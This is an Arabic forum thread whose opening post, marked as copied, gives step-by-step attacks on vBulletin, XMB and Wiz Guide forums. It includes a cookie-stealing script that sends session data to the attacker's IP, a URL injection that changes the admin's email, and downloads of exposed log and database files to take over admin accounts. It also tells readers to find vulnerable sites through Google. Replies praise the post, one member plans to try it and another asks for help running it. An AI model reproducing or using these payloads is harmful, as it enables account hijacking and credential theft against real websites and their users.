مشاهدة : 25591
صفحة 1 من 6 123 ... الأخيرةالأخيرة
النتائج 1 إلى 8 من 47

تعلم كيفية اختراق المنتديات للمحترفين فقط

بسم الله الرحمن الرحيم ثغرة لإختراق كل المنتديات وخصوصاًvBulletin ====================== بسم الله الرحمن الرحيم .. يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..

  1. #1
    وطواط غير متصل صعب اننا نوصفه
    تاريخ التسجيل
    Sep 2005
    الدولة
    K.S.A
    المشاركات
    3,375
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    12

    نط تعلم كيفية اختراق المنتديات للمحترفين فقط

    بسم الله الرحمن الرحيم

    ثغرة لإختراق كل المنتديات وخصوصاًvBulletin
    ======================
    بسم الله الرحمن الرحيم ..

    يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
    الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
    وانا الان اضع امامكم الطريقة من A - Z .

    ---------
    مقدمة :
    ---------

    الموضوع : اختراق ال vBulletin
    المتطلبات : :::Server (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
    المستوى : متوسط

    ملاحظة : هذه الطريقة لست لل vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .


    ----------
    الثغرة :
    ---------

    تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
    بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد ال HTML ..

    قم بكتابة موضوع جديد او رد (في منتدى يدعم ال HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
    <::::::::::::>::::::::::::::::.write('&lt ;im g
    src="http://my_ip_address/'+::::::::::::::::.::::::::::::+'">';</::::::::::::>

    مع ملاحظة تغير ال IP Adress الى رقم ال IP الخاص بك .

    وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
    من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
    الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

    وبعد ان تتم العملية بنجاح قم بفتح ملف ال Log الخاص بالسيرفر الذي يحتويه جهازك ..
    مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
    ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

    ابحث عن الكود الخاص بالباسورد .. مثال :

    GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb







    ddf90622;%20sessionhash=a
    4719cd620534914930b86839c4bb5f8;%20bbthreadview[54







    20]=1012444064;%20bblastvi
    sit=1011983161

    فكر قليلا الان .. اين الباسورد ؟؟
    الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
    قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
    http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
    ستجد عبارة : " أهلا بعودتك يا ( اسم الذي سرقت منه الكوكيز....) "
    في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
    لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
    وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

    اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

    ------------
    الحل
    -----------

    للحماية من هذه الثغرة قم باغلاق ال HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
    (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

    كما يجب اغلا كود ال IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <::::::::::::> فاذا وضعت <img> او <Demon> او
    اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
    Be Secret .. Dont' be Lamer .

    تاريخ اكتشاف الثغرة : 31 - 1 - 2002
    تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


    أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين




    إختراق منتديات VP
    ==========
    اختراق المنتديات بس بمنتديات vb

    . قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

    2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

    3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

    أو العنوان التفصيلي التالي :
    http://URL/memberlist.php

    URL = العنوان المستضيف للمنتدى

    مثل = - .com

    4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

    سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

    http://URL/member.php?soitgoe68e45u...&userid=266

    هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

    5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

    http://URL/member.php?soitgoe68e45u...fo&userid=1

    العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

    (((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

    أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

    6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

    http://URL/member.php?action=login&a...DPASS&url=' );'.$use rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HE RE' +WH ERE+username='ADMIN'').'

    العنوان هذا ستقوم بتغيير الكلمات التالية

    URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
    VALIDUSER = أسم المستخدم الخاص بك
    VALIDPASS = كلمة السر الخاصة بك
    YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
    ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

    7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات ::::::: .

    8. ثم ترجع لصفحة المنتدى الرئيسية
    http://url/index.php

    ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

    بالطيع ستظهر لك الصفحة التعيسة التي تقول :

    أنت قمت بكتابة كلمة سر خاطئة

    you typed in the wrong password


    9. بكل بساطة أضغط على

    نسيت كلمة السر
    forgot password

    والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

    10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى



    إختراق منتديات xmb
    ==========
    تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..

    وصف للثغره::
    وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر

    الأصدار المصاب:::
    XMB 1.6 Magic Lantern Final

    الشرح والتطبيق:::
    جا وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اووضح وأسهل:

    1- عليك بالذهاب الى موقع جوجل http://www.google.com
    2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
    3- سوف ترى منتديات كثييره اكثرها مصابه بهذه الثغره لكن رجااء
    لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
    4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
    index_log.log يعني راح يكون زي كده
    http://www.::::::::::::.com/massegboard/index_log.log
    5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
    المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
    6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
    وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
    7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك زي
    كده مثلا::
    xmbuser=admin
    واباس راح تلقاه قدامه زي كده
    xmbpw=1faeb6747a31c854800ddf3c62b1717a
    8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
    CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
    ftp://www.cafecounterintelligence.com/cci/chigger.exe



    إختراق منتديات ::: Wiz Guide
    ======================================
    مثال:http://host.basharnet.com/forum

    بسم الله الرحمن الرحيم

    السلام عليكم

    الشرح: ثغرة تصيب منتديات ::: Wiz Guide

    أولا إذهب إلى google
    اكتب
    ::: Wiz forum

    وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
    admin/wwforum.mdb

    حمل الملف وادخل عليه عن طريق microsoft office access

    بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin

    سجل اسمك والباسوورد

    الآن أنت في لوحة التحكم

    منقول

    اخوكم\\وطواط

  2. #2
    صورة Eng. Hussain
    Eng. Hussain غير متصل اداري قدير سابق
    تاريخ التسجيل
    Mar 2006
    الدولة
    Я شمالي وهواها ضدي R
    المشاركات
    14,341
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    405

    رد: تعلم كيفية اختراق المنتديات للمحترفين فقط

    كذا الشغل ولا بلاش ...!





    يعافيك ربي وطواط باشا



    دائما تبهرنا بجديدك ..




    لك ودي واحترامي >>>

  3. #3
    وطواط غير متصل صعب اننا نوصفه
    تاريخ التسجيل
    Sep 2005
    الدولة
    K.S.A
    المشاركات
    3,375
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    12

    رد: تعلم كيفية اختراق المنتديات للمحترفين فقط

    مشكور اخوي اسير على مرورك


    بوجود الرد حقك صار الموضوع احسن




    اخوكم\\وطواط

  4. #4
    علاوي07 غير متصل طالب ابتدائي
    تاريخ التسجيل
    Sep 2007
    المشاركات
    61
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    7

    رد: تعلم كيفية اختراق المنتديات للمحترفين فقط

    اقتباس المشاركة الأصلية كتبت بواسطة وطواط مشاهدة المشاركة



    إختراق منتديات VP
    ==========
    اختراق المنتديات بس بمنتديات vb

    . قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

    2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

    3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

    أو العنوان التفصيلي التالي :
    http://URL/memberlist.php

    URL = العنوان المستضيف للمنتدى

    مثل = - .com

    4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

    سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

    http://URL/member.php?soitgoe68e45u...&userid=266

    هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

    5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

    http://URL/member.php?soitgoe68e45u...fo&userid=1

    العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

    (((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

    أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

    6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

    http://URL/member.php?action=login&a...DPASS&url=' );'.$use rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HE RE' +WH ERE+username='ADMIN'').'

    العنوان هذا ستقوم بتغيير الكلمات التالية

    URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
    VALIDUSER = أسم المستخدم الخاص بك
    VALIDPASS = كلمة السر الخاصة بك
    YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
    ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

    7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات ::::::: .

    8. ثم ترجع لصفحة المنتدى الرئيسية
    http://url/index.php

    ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

    بالطيع ستظهر لك الصفحة التعيسة التي تقول :

    أنت قمت بكتابة كلمة سر خاطئة

    you typed in the wrong password


    9. بكل بساطة أضغط على

    نسيت كلمة السر
    forgot password

    والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

    10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى



    تحياتي لك وطواط وعلى شرحك الممتاز بس ممكن سؤال؟

    انت تقول نغير "VALIDUSER = أسم المستخدم الخاص بك"
    بس أخوي ممكن توضح مكان كلمة VALIDUSER بالظبط لاني بحثت في الرابط ولم اجدها..

  5. #5
    صورة Butterfly_03
    Butterfly_03 غير متصل جاي معه ملفه
    تاريخ التسجيل
    Dec 2007
    الدولة
    السعودية
    المشاركات
    10
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    0

    روعه رد: تعلم كيفية اختراق المنتديات للمحترفين فقط

    ما شاء الله عليك وطواط والله خطير.... أفكر اجرب هذي الطريقة ...

    راح اجربها قريب

  6. #6
    علاوي07 غير متصل طالب ابتدائي
    تاريخ التسجيل
    Sep 2007
    المشاركات
    61
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    7

    رد: تعلم كيفية اختراق المنتديات للمحترفين فقط

    أخو وطواط أنا لي يوم كامل انتظر انك ترد علي

  7. #7
    علاوي07 غير متصل طالب ابتدائي
    تاريخ التسجيل
    Sep 2007
    المشاركات
    61
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    7

    رد: تعلم كيفية اختراق المنتديات للمحترفين فقط

    تكفون يا جماعة انا ترون لي يوم ونص معلق محد يرد على تكفون اي واحد يفهم في الموضوع هادا يرد تكفون

  8. #8
    مجاهد الكتروني غير متصل فريق الدعم الفني للهكر
    تاريخ التسجيل
    Dec 2007
    الدولة
    بيت الله
    المشاركات
    1,107
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    8

    رد: تعلم كيفية اختراق المنتديات للمحترفين فقط

    مشكوووو ر وطواط على طرح الموضوع وانشاءالله نستفيد منك

صفحة 1 من 6 123 ... الأخيرةالأخيرة
الدورات التدريبية جامعة نجران
يشرفنا اعجابك على فيس بوك facebook